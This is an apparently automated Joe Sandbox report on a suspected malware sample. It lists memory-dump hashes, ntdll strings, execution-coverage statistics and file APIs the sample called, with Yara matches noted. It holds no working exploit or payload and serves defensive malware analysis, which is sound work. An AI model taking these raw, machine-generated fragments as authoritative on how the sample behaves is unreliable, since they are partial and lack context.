                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                          • Instruction ID: 8b99fd618d5a270434344ccf184f4bc9887f5ecd642e4271aaf1647dd23b450f
                                          • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                          • Instruction Fuzzy Hash: 38E06D72110600BBE725DB44CD45FA673ECEB09720F500658B115DA0D0DBB4FE40CA61
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a74a6f495a697b74025199bcdba273ad4fc0486fa32ea03673c8bbce37b196f5
                                          • Instruction ID: f92c232adbce57ca8f6ed7ad670056289f0d85cdb998ef77875594f2766aa640
                                          • Opcode Fuzzy Hash: a74a6f495a697b74025199bcdba273ad4fc0486fa32ea03673c8bbce37b196f5
                                          • Instruction Fuzzy Hash: B2E092321116449BC721AB18CC15F9A7BAAEB90364F004119F1165B5A1CB39AD10CBC5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                          • Instruction ID: 3e344b3b49aac43e485b3ce4f86eb24297625a00137dd23b500f309ad1b4a1e3
                                          • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                          • Instruction Fuzzy Hash: ACD05B31052610AAC7311F10EE15F537AB5AF40B10F05051CF1451A8F08665ED55DAA6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                          • Instruction ID: 8ee220fdaf97a6f7cd77f06137aa4e3a102108576b0d79ff4b5cba4fd13089ae
                                          • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                          • Instruction Fuzzy Hash: 64E08C79A20680DFCB02DB49CA54F4EB7F6BB84B00F140408A4085F665C368E900CB40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                          • Instruction ID: d1979e61031a9db0272da23a57c328393f2493c49d9d0b43f30264701e8c87b3
                                          • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                          • Instruction Fuzzy Hash: 37D0A932214610ABD332AA1CFC04FC373E9BB88B25F02085DF008CB050C368EC81CA80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                          • Instruction ID: 9bf204167022778606903ad76e2bfc2fe07c9b123cd47c14526932b83c5af0cb
                                          • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                          • Instruction Fuzzy Hash: 6AD012371E054CFBCB119F65DC01F957BA9E795B60F044020F5088B5A0CA3AE950D984
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                          • Instruction ID: 3256e8135b71136595d215ddeeabe7b946858f6a7e265d93e76dabd452302450
                                          • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                          • Instruction Fuzzy Hash: 8EC01232150644AFC7119A94CD01F0177A9E758B00F000021F2044B570C635E810DA44
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction ID: 82fd5e7a4989859a9dca85b48b4addcc88e356f851f11327295f5e0beb1b4f4e
                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction Fuzzy Hash: A7D0123610024CEFCB01DF41C854D9A773AFFC8710F108019FD190B6108A35ED62DB50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                          • Instruction ID: 3cfeeb51649e925247a41431618524595e23ae68f873d799a5078b558feb4878
                                          • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                          • Instruction Fuzzy Hash: D6C08CB8151280AAFB1A5B00CD14B283A95BB09B59F80059CAA041D4A1C76EE801C70C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                          • Instruction ID: 059b3b14d53d6ec18129530380ae6ccdcdcd078a3bda377c0fa1b629cdcb9135
                                          • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                          • Instruction Fuzzy Hash: BCC04C397516408FDF05CB19C288F0977E5B744750F1508D0E905CF721D764EC00CA11
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ff621cb0f92af975776cde12b148c440a80043b7af00713c77bce656441bdf4
                                          • Instruction ID: 93fc5159beb3c70d08e4ac799ccb62dbdf20cd50a1242a6f3458c73dcc1ae4c7
                                          • Opcode Fuzzy Hash: 0ff621cb0f92af975776cde12b148c440a80043b7af00713c77bce656441bdf4
                                          • Instruction Fuzzy Hash: 559002A16111045245407559890440A600957E1301392C62AA0544960DC6288859B269
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 394ef23a43a035bc9a3f025c7f052e214fcda75b5ab46e62c3171fb7f8552c44
                                          • Instruction ID: ffac1785eb68094c8d5b68915e748abfa05dea5a40cb23e50e6e5471983d3575
                                          • Opcode Fuzzy Hash: 394ef23a43a035bc9a3f025c7f052e214fcda75b5ab46e62c3171fb7f8552c44
                                          • Instruction Fuzzy Hash: 989002716154042295407559898454A400957E0301B52C526E0414954DCA24895A7361
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3df89d37bc5ba088b54b30de5ae39323c4d95587cf0bd16ccd1e86f9ecedf7
                                          • Instruction ID: 938579d31f4228987d0a68ab4d1ee5d337124eb7e968d7044448f128e12d80dd
                                          • Opcode Fuzzy Hash: 4f3df89d37bc5ba088b54b30de5ae39323c4d95587cf0bd16ccd1e86f9ecedf7
                                          • Instruction Fuzzy Hash: D990026121144852D54076598904B0F410947E1202F92C52EA4146954DC92588597721
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4daeebfa7150777dc283ebefa62d533e66e36973462afbe82651e8ba4a0ad326
                                          • Instruction ID: 7c89a936b4790788d8433919df70cfec7f4d116bce63ba28ab6ca7877f3da4d4
                                          • Opcode Fuzzy Hash: 4daeebfa7150777dc283ebefa62d533e66e36973462afbe82651e8ba4a0ad326
                                          • Instruction Fuzzy Hash: 6190026122180452D60079698D14B0B000947D0303F52C62AA0144954DC92588657521
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eeae2a47a736a274f7497394da4e7cef3964de084208b0c15534aabf39ba4b79
                                          • Instruction ID: 5b8cbbe2584beb7bfd461a16648025d899d18d6ff0c9e7b29735d93e0885fed3
                                          • Opcode Fuzzy Hash: eeae2a47a736a274f7497394da4e7cef3964de084208b0c15534aabf39ba4b79
                                          • Instruction Fuzzy Hash: 4D90026125100C12D5407559C51470B000A87D0601F52C526A0014954EC626896976B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 727d64d3518bc39095bc96158b81fe16fc2665ccbda2eb23460ea670a44585c9
                                          • Instruction ID: efe1955e226172ef7f8cd2c39a6facd26ccf5e6254a5eb1114eb3f881fc8dfc2
                                          • Opcode Fuzzy Hash: 727d64d3518bc39095bc96158b81fe16fc2665ccbda2eb23460ea670a44585c9
                                          • Instruction Fuzzy Hash: 849002A135100852D50075598514B0A000987E1301F52C52AE1054954EC629CC567126
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f82946a49be89dc268ef8d5ba30db75d9f9f09af24b5ea4a4e42e7d1ea1a5972
                                          • Instruction ID: a12b283aa45931190c1b6aedb5b11c77c679f844cbc01236b7fc105d33fceab8
                                          • Opcode Fuzzy Hash: f82946a49be89dc268ef8d5ba30db75d9f9f09af24b5ea4a4e42e7d1ea1a5972
                                          • Instruction Fuzzy Hash: 889002A121140813D5407959890460B000947D0302F52C526A2054955FCA398C557135
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b77ed2e1543219a2022940d3f0a86811c6eb5136010c9e490c7245ab59db6648
                                          • Instruction ID: b7b8ce379e9752affa9131521d145e3a12c068d99955a692452d780e1c673752
                                          • Opcode Fuzzy Hash: b77ed2e1543219a2022940d3f0a86811c6eb5136010c9e490c7245ab59db6648
                                          • Instruction Fuzzy Hash: 5E9002616110045245407569C94490A40096BE1211752C636A0988950EC56988697665
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: affdd38a4e7002fa3b474e388d05c5b40cc929a25302a0ceb04d32c7d59b4e17
                                          • Instruction ID: d4e54c1f146526eccf58c678b138386f7791317f42e0522100569aad175f997b
                                          • Opcode Fuzzy Hash: affdd38a4e7002fa3b474e388d05c5b40cc929a25302a0ceb04d32c7d59b4e17
                                          • Instruction Fuzzy Hash: 2490027121140812D5007559890874B000947D0302F52C526A5154955FC675C8957531
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e63f18630d1029425bf824c8d6e152a345c88c94d5d04cce58e1f1a947404df

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122

                                          Strings
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37764530
                                          • ExecuteOptions, xrefs: 377644AB
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3776454D
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37764507
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 37764592
                                          • Execute=1, xrefs: 3776451E
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37764460
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025

                                          Strings
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 377577E2
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37757807
                                          • SsHd, xrefs: 3770A304
                                          • Actx , xrefs: 37757819, 37757880
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 377578F3
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 377577DD, 37757802
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188

                                          APIs
                                          Strings
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37759153
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37759178
                                          • Actx , xrefs: 37759315
                                          • GsHd, xrefs: 3770D794
                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37759372
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3775914E, 37759173
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                          • API String ID: 3446177414-2196497285
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          APIs
                                          Strings
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37749843
                                          • minkernel\ntdll\ldrinit.c, xrefs: 37749854, 37749895
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37749885
                                          • LdrpLoadShimEngine, xrefs: 3774984A, 3774988B
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          APIs
                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 37763440, 3776346C
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37763439
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 37763466
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 3776344A, 37763476
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ^n7
                                          • API String ID: 3446177414-3868608643
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872

                                          Execution Graph

                                          Execution Coverage:2.7%
                                          Dynamic/Decrypted Code Coverage:4.3%
                                          Signature Coverage:0.7%
                                          Total number of Nodes:447
                                          Total number of Limit Nodes:71

                                          Control-flow Graph

                                          [Graph image not reproduced; legend: Executed, Not Executed]
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !$$$$i$)$-$16$3$6'$6;$8C$;$<n$C$Dw$E)!$Er$N$O$S$T$Z;$[$]$cA$d$d$k$lW$r$vc$y$z
                                          • API String ID: 0-3167844322
                                          • Opcode ID: 17f72081993f1350ba3dcad221bfd468072d57c041a8682a4f70213efaf9b8fa
                                          • Instruction ID: 2d648ca098a45d938ec1be96765c6e5b8689206d36fce45bbae1f99682571910
                                          • Opcode Fuzzy Hash: 17f72081993f1350ba3dcad221bfd468072d57c041a8682a4f70213efaf9b8fa
                                          • Instruction Fuzzy Hash: BB428AB0906229CFEB64CF45C998BDDBBB1BB45308F1081D9C64D6B681C7B95AC9CF84
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0310BB74
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0310BBAF
                                          • FindClose.KERNELBASE(?), ref: 0310BBBA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: 0017a93d3205b3efa7fcf2b79af04eccd76381ec53dafa3fad9846cf36fa16e2
                                          • Instruction ID: 95c92d2cef1946a65a1f528d6671867ae9c44a8f7cf65c42c1eb5d55e08a0b6c
                                          • Opcode Fuzzy Hash: 0017a93d3205b3efa7fcf2b79af04eccd76381ec53dafa3fad9846cf36fa16e2
                                          • Instruction Fuzzy Hash: 263174B5904308BBDB20DF64CC85FEF777CDF88754F1445A8B918AB180D7B4AA948BA0
                                          APIs
                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03117A10
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 867ed298efe7a846261c740fdf5280c3ee3bf7386c092a51625ad0b6e288e5bc
                                          • Instruction ID: a0dd28ac3697104628c968bb496440403334ac20d6c8a52afa93c67dd0feee36
                                          • Opcode Fuzzy Hash: 867ed298efe7a846261c740fdf5280c3ee3bf7386c092a51625ad0b6e288e5bc
                                          • Instruction Fuzzy Hash: 6331C6B5A01609AFCB14DF99D881EEFB7F9AF8C314F108259F918A7340D730A951CBA5
                                          APIs
                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03117B58
                                          Memory Dump Source
